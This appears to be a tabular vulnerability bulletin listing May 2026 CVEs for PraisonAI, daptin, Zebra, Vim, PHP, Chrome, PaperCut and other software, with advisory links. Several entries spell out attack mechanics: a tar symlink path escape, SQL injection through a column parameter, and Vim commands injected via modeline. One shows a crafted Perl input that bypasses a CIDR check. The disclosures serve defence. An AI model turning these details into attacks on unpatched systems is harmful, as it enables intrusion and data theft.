| MervinPraison--PraisonAI | PraisonAI is a multi-agent teams system. Prior to version 4.6.37, the _safe_extractall helper that all recipe pull, recipe publish, and recipe unpack flows route through validates each archive member's name for absolute paths, .. segments, and resolved-path escape - but does not validate member.linkname, does not reject symlink/hardlink members, and calls tar.extractall(dest_dir) without filter="data". A bundle that contains a symlink with a name inside dest_dir but a linkname pointing outside it, followed by a regular file whose path traverses through the just-created symlink, escapes dest_dir and lets the attacker write arbitrary content to an attacker-chosen location on the victim's filesystem. This issue has been patched in version 4.6.37. | 2026-05-08 | not yet calculated | CVE-2026-44340 | https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-9q28-ghcr-c4x3 |
| daptin--daptin | Daptin is a GraphQL/JSON-API headless CMS. Prior to version 0.11.5, processFuzzySearch in server/resource/resource_findallpaginated.go:1484 splits the user-supplied column parameter by comma and interpolates each segment directly into goqu.L(fmt.Sprintf("LOWER(%s) LIKE ?", prefix+col)) raw SQL with no column whitelist check. The entry point is GET /api/<entity> with operator=fuzzy (or fuzzy_any, fuzzy_all). Any authenticated user - including one who self-registered with no admin involvement - can read the entire database. This issue has been patched in version 0.11.5. | 2026-05-07 | not yet calculated | CVE-2026-44349 | https://github.com/daptin/daptin/security/advisories/GHSA-pwqg-q8pg-pp6r https://github.com/daptin/daptin/releases/tag/v0.11.5 |
| ZcashFoundation--zebra | ZEBRA is a Zcash node written entirely in Rust. Prior to zebrad version 4.4.0 and prior to zebra-script version 6.0.0, the fix for CVE-2026-41583 introduced a separate issue due to insufficient error handling of the case where the sighash type is invalid, during sighash computation. Instead of returning an error, the normal flow would resume, and the input sighash buffer would be left untouched. In scenarios where a previous signature validation could leave a valid sighash in the buffer, an invalid hash-type could be incorrectly accepted, which would create a consensus split between Zebra and zcashd nodes. This issue has been patched in zebrad version 4.4.0 and zebra-script version 6.0.0. | 2026-05-08 | not yet calculated | CVE-2026-44497 | https://github.com/ZcashFoundation/zebra/security/advisories/GHSA-gq4h-3grw-2rhv |
| ZcashFoundation--zebra | ZEBRA is a Zcash node written entirely in Rust. Prior to version 4.4.0, Zebra's block validator undercounts transparent signature operations against the 20000-sigop block limit (MAX_BLOCK_SIGOPS), allowing it to accept blocks that zcashd rejects with bad-blk-sigops. A miner who produces such a block can split the network: Zebra nodes follow the offending chain while zcashd nodes do not. This issue has been patched in version 4.4.0. | 2026-05-08 | not yet calculated | CVE-2026-44498 | https://github.com/ZcashFoundation/zebra/security/advisories/GHSA-jv4h-j224-23cc https://github.com/ZcashFoundation/zebra/releases/tag/v4.4.0 |
| ZcashFoundation--zebra | ZEBRA is a Zcash node written entirely in Rust. Prior to version 4.4.0, a composite denial-of-service vulnerability in Zebra's block discovery pipeline allows an unauthenticated remote attacker to permanently halt all new block discovery on a targeted node. The attack exploits three independent weaknesses in the gossip, syncer, and download subsystems - all exercisable from a single TCP connection - to create a monotonically growing block deficit that never self-heals. This issue has been patched in version 4.4.0. | 2026-05-08 | not yet calculated | CVE-2026-44499 | https://github.com/ZcashFoundation/zebra/security/advisories/GHSA-h9hm-m2xj-4rq9 |
| vim--vim | Vim is an open source, command line text editor. Prior to version 9.2.0435, an OS command injection vulnerability exists in Vim's :find command-line completion. When the path option contains backtick-enclosed shell commands, those commands are executed during file name completion. Because the path option lacks the P_SECURE flag, it can be set from a modeline, allowing an attacker who controls the contents of a file to execute arbitrary shell commands when the user opens that file in Vim and triggers :find completion. This issue has been patched in version 9.2.0435. | 2026-05-08 | not yet calculated | CVE-2026-44656 | https://github.com/vim/vim/security/advisories/GHSA-hwg5-3cxw-wvvg https://github.com/vim/vim/commit/190cb3c2b9c769a3972bcfd991a7b5b6cb771ef0 https://github.com/vim/vim/releases/tag/v9.2.0435 |
| czlonkowski--n8n-mcp | n8n-MCP is an MCP server that provides AI assistants access to n8n node documentation, properties, and operations. From version 2.18.7 to before version 2.50.2, there is an authenticated server-side request forgery vulnerability affecting the webhook trigger tools, the n8n API client (N8N_API_URL), and per-request URLs supplied via the x-n8n-url header in multi-tenant HTTP mode. This issue has been patched in version 2.50.2. | 2026-05-08 | not yet calculated | CVE-2026-44694 | https://github.com/czlonkowski/n8n-mcp/security/advisories/GHSA-cmrh-wvq6-wm9r https://github.com/czlonkowski/n8n-mcp/commit/bcaba839409d470abeb4a6ad9b361b553a1098eb https://github.com/czlonkowski/n8n-mcp/releases/tag/v2.50.2 |
| RRWO--Plack::Middleware::Statsd | Plack::Middleware::Statsd versions before 0.9.0 for Perl may leak user IP addresses. If the communication channel to the statsd daemon is not secured (for example, by sending UDP packets to a host on another network), then users' IP addresses may be leaked. Since version 0.9.0, the IP address is no longer logged to statsd unless configured. When configured, an HMAC signature of the IP address is logged instead. | 2026-05-10 | not yet calculated | CVE-2026-45179 | https://github.com/robrwo/Plack-Middleware-Statsd/security/advisories/GHSA-9gwm-665p-w2xx https://metacpan.org/release/RRWO/Plack-Middleware-Statsd-v0.9.0/changes |
| RRWO--Catalyst::Plugin::Statsd | Catalyst::Plugin::Statsd versions through 0.10.0 for Perl may leak session ids. If the communication channel to the statsd daemon is not secured (for example, by sending UDP packets to a host on another network), then users' session ids may be leaked. This may allow an attacker to use session ids as authentication tokens. | 2026-05-10 | not yet calculated | CVE-2026-45180 | https://github.com/robrwo/CatalystX-Statsd/security/advisories/GHSA-gjvr-hq83-fc38 https://metacpan.org/release/RRWO/Catalyst-Plugin-Statsd-v0.10.0/changes https://www.cve.org/CVERecord?id=CVE-2026-45179 https://github.com/robrwo/Plack-Middleware-Statsd/security/advisories/GHSA-9gwm-665p-w2xx |
| STIGTSP--Net::CIDR::Lite | Net::CIDR::Lite versions before 0.24 for Perl does not properly validate IP address and CIDR mask inputs, which may allow IP ACL bypass. Inputs containing a trailing newline or non-ASCII digit characters pass the validators but are then re-encoded by the parser to a different address than the input string spelled. find() and bin_find() can match or miss addresses as a result. Example: my $cidr = Net::CIDR::Lite->new(); $cidr->add("::1\n/128"); $cidr->find("::1a"); # incorrectly returns true See also CVE-2026-45191. | 2026-05-10 | not yet calculated | CVE-2026-45190 | https://github.com/stigtsp/Net-CIDR-Lite/commit/ca9542adec87110556601d7ce48381ea8d13e692.patch https://metacpan.org/release/STIGTSP/Net-CIDR-Lite-0.24/changes https://www.cve.org/CVERecord?id=CVE-2026-45191 |
| STIGTSP--Net::CIDR::Lite | Net::CIDR::Lite versions before 0.24 for Perl does not properly consider extraneous zero characters in CIDR mask values, which may allow IP ACL bypass. Mask forms like "/00" and "/01" pass validation and parse to the same prefix as their unpadded value. See also CVE-2026-45190. | 2026-05-10 | not yet calculated | CVE-2026-45191 | https://github.com/stigtsp/Net-CIDR-Lite/commit/24e2c439ec405e5256024b9acefd4f7008c5ed0c.patch https://metacpan.org/release/STIGTSP/Net-CIDR-Lite-0.24/changes https://www.cve.org/CVERecord?id=CVE-2026-45190 |
| Unknown--OttoKit: All-in-One Automation Platform | The OttoKit: All-in-One Automation Platform WordPress plugin before 1.1.23 does not properly sanitize user input before using it in a SQL statement, which could allow unauthenticated attackers to perform SQL injection attacks. | 2026-05-08 | not yet calculated | CVE-2026-4935 | https://wpscan.com/vulnerability/54bc1bf4-1033-49e2-aff9-a14c834c35bd/ |
| CHORNY--Apache::Session::Generate::ModUniqueId | Apache::Session::Generate::ModUniqueId versions from 1.54 through 1.94 for Perl session ids are insecure. Apache::Session::Generate::ModUniqueId (added in version 1.54) uses the value of the UNIQUE_ID environment variable for the session id. The UNIQUE_ID variable is set by the Apache mod_unique_id plugin, which generates unique ids for the request. The id is based on the IPv4 address, the process id, the epoch time, a 16-bit counter and a thread index, with no obfuscation. The server IP is often available to the public, and if not available, can be guessed from previous session ids being issued. The process ids may also be guessed from previous session ids. The timestamp is easily guessed (and leaked in the HTTP Date response header). The purpose of mod_unique_id is to assign a unique id to requests so that events can be correlated in different logs. The id is not designed, nor is it suitable for security purposes. | 2026-05-06 | not yet calculated | CVE-2026-5081 | https://httpd.apache.org/docs/current/mod/mod_unique_id.html https://metacpan.org/pod/Apache::Session::Generate::Random |
| Unknown--Magic Export & Import | The Magic Export & Import WordPress plugin before 1.2.0 stores exported CSV files at a publicly accessible location, making it possible for any visitors to leak sensitive user information. | 2026-05-04 | not yet calculated | CVE-2026-5335 | https://wpscan.com/vulnerability/ed6f00de-bbae-4e89-9d0e-ded0d70e781c/ |
| PHP Group--PHP | In PHP versions 8.4.* before 8.4.21 and 8.5.* before 8.5.6, when an encoding name containing an embedded NUL byte is passed to mb_convert_encoding() or related mbstring functions, the code incorrectly assumes that when strncasecmp() returns 0 it means the strings have the same length. This can lead to out-of-bounds read of global memory, potentially causing a crash or information disclosure or crash. Affected functions include mb_convert_encoding(), mb_detect_encoding(), mb_convert_variables(), and mb_detect_order(), as well as the mbstring.detect_order and mbstring.http_output INI settings. | 2026-05-10 | not yet calculated | CVE-2026-6104 | https://github.com/php/php-src/security/advisories/GHSA-74r9-qxhc-fx53 |
| PaperCut--PaperCut NG/MF | A race condition exists in PaperCut MF when processing badge-swipe data from certain HP multifunction devices. Under specific network conditions involving dropped packets and out-of-order sequence counters, the server may incorrectly process fragmented data chunks. If a sequence reset notification fails to reach the server, the server may reject the initial data chunk while erroneously accepting subsequent chunks before a connection reset completes. This leads to the registration of a truncated badge ID string. While this typically results in an authentication failure, the vulnerability is compounded in environments utilizing custom badge-ID post-processing scripts. In such configurations, the truncated string may be transformed into a valid ID belonging to a different user, leading to unauthorized session establishment (Incorrect User Login) on the device. | 2026-05-05 | not yet calculated | CVE-2026-6180 | https://www.papercut.com/kb/Main/papercut-ng-mf-and-papercut-hive-security-bulletin-may-2026/ |
| The Qt Company--Qt | A type confusion vulnerability in Qt SVG allows an attacker to cause an application crash via a crafted SVG image. When processing SVG marker references, the renderer retrieves a node by its id attribute and casts it to QSvgMarker* without verifying the node type. A non-marker element (such as a <line> element) that references itself as a marker triggers an out-of-bounds heap read due to the object size difference between QSvgLine and QSvgMarker, followed by an endless recursion that bypasses the marker recursion guard through incorrect virtual dispatch. The result is an application crash (denial of service). This issue affects Qt SVG: from 6.7.0 before 6.8.8, from 6.9.0 before 6.11.1. | 2026-05-06 | not yet calculated | CVE-2026-6210 | https://codereview.qt-project.org/c/qt/qtsvg/+/724887 https://issues.oss-fuzz.com/issues/496327371 |
| Remote Spark (https://www.remotespark.com/)--SparkView | A vulnerability in Remote Spark SparkView before build 1122 allows an attacker to bypasses the local connection check and achieve arbitrary code execution as root on the server side. Depending on implementation the vulnerability can be exploited by an unauthenticated attacker. | 2026-05-08 | not yet calculated | CVE-2026-6213 | https://www.remotespark.com/view/new.html |
| PaperCut--PaperCut NG/MF | An issue was discovered in the Shared Account Synchronization component of PaperCut MF (version 25.0.4). The application allows administrative users to configure a source path for account data synchronization. Due to a lack of proper path validation and sanitization, an authenticated user with administrative privileges can specify arbitrary file paths on the local file system. This allows for the enumeration of directory structures and the unauthorized reading of sensitive text-based configuration or system files. When the synchronization process is triggered, the application attempts to parse the contents of the specified file, subsequently exposing the data within the application's account management interface. This vulnerability could lead to the disclosure of sensitive system information or configuration details, depending on the permissions of the service account under which the application is running. | 2026-05-05 | not yet calculated | CVE-2026-6418 | https://www.papercut.com/kb/Main/papercut-ng-mf-and-papercut-hive-security-bulletin-may-2026/ |
| ILM Informatique--OpenConcerto | Incorrect Permission Assignment for Critical Resource vulnerability in ILM Informatique OpenConcerto allows Replace Binaries. This issue affects OpenConcerto: 1.7.5. | 2026-05-04 | not yet calculated | CVE-2026-6499 | https://www.openconcerto.org/fr/version-1.7.html |
| ILM Informatique--OpenConcerto | Plaintext storage of a password vulnerability in ILM Informatique OpenConcerto allows Retrieve Embedded Sensitive Data. This issue affects OpenConcerto: 1.7.5. | 2026-05-04 | not yet calculated | CVE-2026-6500 | https://www.openconcerto.org/fr/version-1.7.html |
| ILM Informatique--jOpenDocument | Improper restriction of XML external entity reference vulnerability in ILM Informatique jOpenDocument allows Data Serialization External Entities Blowup. This issue affects jOpenDocument: 1.5. | 2026-05-04 | not yet calculated | CVE-2026-6501 | https://www.jopendocument.org/documentation.html |
| RSAVAGE--Crypt::PasswdMD5 | Crypt::PasswdMD5 versions through 1.42 for Perl generates insecure random values for salts. The built-in rand function is predictable, and unsuitable for cryptography. | 2026-05-08 | not yet calculated | CVE-2026-6659 | https://metacpan.org/release/RSAVAGE/Crypt-PasswdMD5-1.42/source/lib/Crypt/PasswdMD5.pm#L35-47 |
| PHP Group--PHP | In PHP versions 8.2.* before 8.2.31, 8.3.* before 8.3.31, 8.4.* before 8.4.21, and 8.5.* before 8.5.6, the SOAP extension's object deduplication mechanism stores pointers to PHP objects in a global map without incrementing their reference counts. When an apache:Map node contains duplicate keys, processing the second entry overwrites the first in the temporary result map, freeing the original PHP object while its stale pointer remains in the map. A subsequent href reference to the freed node can copy the dangling pointer into the result. As PHP string allocations can reclaim the freed memory region, an attacker with control over the SOAP request body can exploit this use-after-free to achieve remote code execution. | 2026-05-10 | not yet calculated | CVE-2026-6722 | https://github.com/php/php-src/security/advisories/GHSA-85c2-q967-79q5 |
| PHP Group--PHP | In PHP versions 8.2.* before 8.2.31, 8.3.* before 8.3.31, 8.4.* before 8.4.21, 8.5.* before 8.5.6, due to improper sanitation of user data, it allows an attacker to compose an URL, which will cause the target to execute arbitrary JavaScript code (XSS) on the target's machine when the target is viewing the PHP-FPM status page. | 2026-05-10 | not yet calculated | CVE-2026-6735 | https://github.com/php/php-src/security/advisories/GHSA-7qg2-v9fj-4mwv |
| GitHub--Enterprise Server | An authentication bypass vulnerability was identified in GitHub Enterprise Server that allowed an unauthenticated attacker to create a local user account, bypassing the configured external identity provider. When external authentication was enabled, the signup endpoint did not properly enforce the authentication restriction, allowing account creation and session establishment without identity provider validation. The created account was limited to the default base permissions configured on the instance. Exploitation required network access to a GHES instance configured with an external authentication provider. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.21 and was fixed in versions 3.20.2, 3.19.6, 3.18.9, 3.17.15, and 3.16.18. | 2026-05-07 | not yet calculated | CVE-2026-6736 | https://docs.github.com/en/enterprise-server@3.16/admin/release-notes#3.16.18 https://docs.github.com/en/enterprise-server@3.17/admin/release-notes#3.17.15 https://docs.github.com/en/enterprise-server@3.18/admin/release-notes#3.18.9 https://docs.github.com/en/enterprise-server@3.19/admin/release-notes#3.19.6 https://docs.github.com/en/enterprise-server@3.20/admin/release-notes#3.20.2 |
| ASUS--AsusPTPFilter | An Exposed IOCTL with Insufficient Access Control vulnerability in AsusPTPFilter allows a local user to bypass driver security mechanisms and obtain restricted touchpad information or render the touchpad unusable via crafted IOCTL requests.Refer to the ' Security Update for ASUS Precision Touchpad ' section on the ASUS Security Advisory for more information. | 2026-05-08 | not yet calculated | CVE-2026-6737 | https://www.asus.com/security-advisory |
| WatchGuard--WatchGuard Agent | Use of Hard-coded Cryptographic Key vulnerability in WatchGuard Agent on Windows allows Inclusion of Code in Existing Process.This issue affects WatchGuard Agent: before 1.25.03.0000. | 2026-05-06 | not yet calculated | CVE-2026-6787 | https://www.watchguard.com/wgrd-psirt/advisory/WGSA-2026-00013 |
| WatchGuard--WatchGuard Agent | Uncontrolled Search Path Element vulnerability in WatchGuard Agent on Windows allows Using Malicious Files.This issue affects WatchGuard Agent before 1.25.03.0000. | 2026-05-06 | not yet calculated | CVE-2026-6788 | https://www.watchguard.com/wgrd-psirt/advisory/WGSA-2026-00013 |
| Ercom--Cryptobox | Vulnerability on the external sharing feature in Cryptobox allows an attacker knowing a sharing link URL to retrieve information from the server allowing an offline brute-force attack of the access code associated to this sharing link. | 2026-05-07 | not yet calculated | CVE-2026-6805 | https://info.cryptobox.com/doc/v4.40/4.40.en/ |
| Eclipse Foundation--Eclipse Vert.x | A TCP client can perform a TLS handshake and present the server name extension with a server name that is accepted by a server wildcard name, e.g. if the server is configured with a certificate accepting *.example.com, any XYZ.example.com where xyz is a valid name can be used. | 2026-05-06 | not yet calculated | CVE-2026-6860 | https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/381 https://github.com/eclipse-vertx/vert.x/security/advisories/GHSA-3g76-f9xq-8vp6 https://github.com/eclipse-vertx/vert.x/pull/6102 |
| Eclipse Foundation--Eclipse OpenJ9 | In Eclipse Open9J versions 0.21 to 0.58, a pre-authentication remote attacker can crash JITServer by sending a 32-byte crafted TCP message. | 2026-05-05 | not yet calculated | CVE-2026-6918 | https://github.com/eclipse-openj9/openj9/security/advisories/GHSA-q393-vr4c-969r https://github.com/eclipse-openj9/openj9/pull/23793 |
| PHP Group--PHP | In PHP versions 8.2.* before 8.2.31, 8.3.* before 8.3.31, 8.4.* before 8.4.21, and 8.5.* before 8.5.6, some functions, including urldecode(), pass signed char to ctype functions (like isxdigit()). On the systems with default signed char and optimized table-lookup ctype functions - such as NetBSD - this can lead to accessing array with negative offset, which can trigger a denial of service. | 2026-05-10 | not yet calculated | CVE-2026-7258 | https://github.com/php/php-src/security/advisories/GHSA-m8rr-4c36-8gq4 |
| PHP Group--PHP | In PHP versions 8.2.* before 8.2.31, 8.3.* before 8.3.31, 8.4.* before 8.4.21, and 8.5.* before 8.5.6, a mismatch between encoding lists in Oniguruma and mbfl leads to a NULL pointer dereference, resulting in a segmentation fault and denial of service. The vulnerability is exploitable when user-controlled input can influence the encoding passed to mb_regex_encoding(). | 2026-05-10 | not yet calculated | CVE-2026-7259 | https://github.com/php/php-src/security/advisories/GHSA-wm6j-2649-pv75 |
| PHP Group--PHP | In PHP versions 8.2.* before 8.2.31, 8.3.* before 8.3.31, 8.4.* before 8.4.21, and 8.5.* before 8.5.6, when SoapServer is configured with SOAP_PERSISTENCE_SESSION, the handler object is persisted across requests via session storage. However, in the case SOAP requests results in an error, the persistance is handled incorrectly, resulting in freeing the object while keeping a pointer to it, which may lead to use-after-free. This may lead to memory corruption, information disclosure, or process crashes, with confidentiality, integrity, and availability impact on the vulnerable system. | 2026-05-10 | not yet calculated | CVE-2026-7261 | https://github.com/php/php-src/security/advisories/GHSA-m33r-qmcv-p97q |
| PHP Group--PHP | In PHP versions 8.2.* before 8.2.31, 8.3.* before 8.3.31, 8.4.* before 8.4.21, and 8.5.* before 8.5.6, when a SOAP server has a typemap configured, the decoding process contains a mistake which checks the wrong variable in case of missing value element. This leads to dereferences a NULL pointer, causing a segmentation fault. This allows a remote unauthenticated attacker to crash the PHP SOAP server process, resulting in denial of service. | 2026-05-10 | not yet calculated | CVE-2026-7262 | https://github.com/php/php-src/security/advisories/GHSA-hmxp-6pc4-f3vv |
| PHP Group--PHP | In PHP versions 8.4.* before 8.4.21 and 8.5.* before 8.5.6, DOMNode::C14N() method may process the XML data incorrectly, causing a circular linked list in the data structure representing the XML document. This may cause subsequent processing of the XML document to enter infinite loop, causing denial of service in the processing application. | 2026-05-10 | not yet calculated | CVE-2026-7263 | https://github.com/php/php-src/security/advisories/GHSA-4jhr-8w89-j733 |
| GitHub--Enterprise Server | A denial of service vulnerability was identified in GitHub Enterprise Server that allowed an unauthenticated attacker to cause service disruption by sending crafted requests with deeply nested JSON payloads to an unauthenticated API endpoint. The endpoint parsed user-controlled JSON request bodies without size or depth limits, causing excessive CPU and memory consumption. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.21 and was fixed in versions 3.20.2, 3.19.6, 3.18.9, 3.17.15, and 3.16.18. This vulnerability was reported via the GitHub Bug Bounty program. | 2026-05-07 | not yet calculated | CVE-2026-7541 | https://docs.github.com/en/enterprise-server@3.16/admin/release-notes#3.16.18 https://docs.github.com/en/enterprise-server@3.17/admin/release-notes#3.17.15 https://docs.github.com/en/enterprise-server@3.18/admin/release-notes#3.18.9 https://docs.github.com/en/enterprise-server@3.19/admin/release-notes#3.19.6 https://docs.github.com/en/enterprise-server@3.20/admin/release-notes#3.20.2 |
| PHP Group--PHP | In PHP versions 8.2.* before 8.2.31, 8.3.* before 8.3.31, 8.4.* before 8.4.21, and 8.5.* before 8.5.6, the metaphone() function in ext/standard/metaphone.c uses a signed int variable to track the current position within the input string. If a string longer than 2,147,483,647 bytes is passed, a signed integer overflow occurs, resulting in undefined behavior. This can lead to an out-of-bounds read, causing a segmentation fault or access to unrelated memory, and may affect the availability of the PHP process. | 2026-05-10 | not yet calculated | CVE-2026-7568 | https://github.com/php/php-src/security/advisories/GHSA-96wq-48vp-hh57 |
| PaperCut--PaperCut Hive | An issue was discovered in the PaperCut Hive Ricoh embedded application. When the "Deep Logging" (diagnostic) mode is enabled, the application inadvertently records administrative credentials in plain text within the log files. An attacker with administrative access to the PaperCut Hive management portal could remotely enable deep logging and subsequently retrieve sensitive device passwords from the logs after an authorized user authenticates at the device. This exposure allows for the lateral movement or unauthorized configuration of the physical print hardware. | 2026-05-05 | not yet calculated | CVE-2026-7824 | https://www.papercut.com/kb/Main/papercut-ng-mf-and-papercut-hive-security-bulletin-may-2026/ |
| SEPPmail AG--Secure Email Gateway | SEPPmail Secure Email Gateway before version 15.0.4 exposes server environment variables through an unauthenticated endpoint in the new GINA UI, allowing remote attackers to obtain sensitive system information. | 2026-05-08 | not yet calculated | CVE-2026-7864 | https://downloads.seppmail.com/extrelnotes/150/ERN15.0.html#security |
| Crestron Electronics--Touchpanels (x60/x70) | A hidden console command is vulnerable to command injection flaw when control characters are passed to its second argument. A third party researcher Eugene Lim had discovered vulnerability in the way console command passes to a popen function call. Attackers with authenticated access to SSH console of Crestron devices may use to run underlying OS commands. | 2026-05-05 | not yet calculated | CVE-2026-7865 | https://www.crestron.com/Software-Firmware/Firmware/Touchpanels/TS-770-TS-1070-TSS-770-TSS-1070-TSW-570/3-003-0015-001 https://www.crestron.com/release_notes/tsw-xx70_3.003.0015.001_release_notes.pdf |
| DIVD--VerySecureApp | The VerySecureApp made by DIVD using Mendix Studio Pro 11.8.0 Beta allows unintended data exposure due to authorization misconfiguration. The VerySecureApp allows anonymous users of the MyFirstModule with the anonymous user role to gain access to all stored records, even though no access rights are explicitly configured on that role. Anonymous users are required to make a Mendix Entity available publicly. All versions of Mendix Studio Pro up to 11.8.0 Beta silently make an Anonymous user role follow user inheritance rules, without mentioning this explicitly in the documentation. | 2026-05-07 | not yet calculated | CVE-2026-7891 | https://csirt.divd.nl/DIVD-2026-00006/ https://www.divd.nl/mendix.html |
| Google--Chrome | Integer overflow in Blink in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-06 | not yet calculated | CVE-2026-7896 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/493747582 |
| Google--Chrome | Use after free in Mobile in Google Chrome on iOS prior to 148.0.7778.96 allowed a remote attacker who convinced a user to engage in specific UI gestures to execute arbitrary code via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-06 | not yet calculated | CVE-2026-7897 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504069514 |
| Google--Chrome | Use after free in Chromoting in Google Chrome on Linux prior to 148.0.7778.96 allowed a remote attacker to execute arbitrary code via malicious network traffic. (Chromium security severity: Critical) | 2026-05-06 | not yet calculated | CVE-2026-7898 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504587882 |
| Google--Chrome | Out of bounds read and write in V8 in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7899 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/505481948 |
| Google--Chrome | Heap buffer overflow in ANGLE in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7900 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496503799 |
| Google--Chrome | Use after free in ANGLE in Google Chrome on Mac prior to 148.0.7778.96 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7901 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497724490 |
| Google--Chrome | Out of bounds memory access in V8 in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7902 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502030575 |
| Google--Chrome | Integer overflow in ANGLE in Google Chrome on Mac,Windows prior to 148.0.7778.96 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7903 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/491760376 |
| Google--Chrome | Out of bounds read in Fonts in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7904 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/492350406 |
| Google--Chrome | Insufficient validation of untrusted input in Media in Google Chrome on Android prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7905 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/495259842 |
| Google--Chrome | Use after free in SVG in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7906 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496284584 |
| Google--Chrome | Use after free in DOM in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7907 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496292089 |
| Google--Chrome | Use after free in Fullscreen in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7908 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497436531 |
| Google--Chrome | Inappropriate implementation in ServiceWorker in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7909 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497437113 |
| Google--Chrome | Use after free in Views in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7910 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497543810 |
| Google--Chrome | Use after free in Aura in Google Chrome on Windows prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7911 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497548912 |
| Google--Chrome | Integer overflow in GPU in Google Chrome on Android prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to perform arbitrary read/write via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7912 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497639714 |
| Google--Chrome | Insufficient policy enforcement in DevTools in Google Chrome on Android prior to 148.0.7778.96 allowed a local attacker to perform privilege escalation via a malicious file. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7913 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497936728 |
| Google--Chrome | Type Confusion in Accessibility in Google Chrome on Windows prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7914 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498401609 |
| Google--Chrome | Insufficient data validation in DevTools in Google Chrome on Android prior to 148.0.7778.96 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7915 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498454478 |
| Google--Chrome | Insufficient data validation in InterestGroups in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7916 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498720754 |
| Google--Chrome | Use after free in Fullscreen in Google Chrome on Windows prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7917 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498752242 |
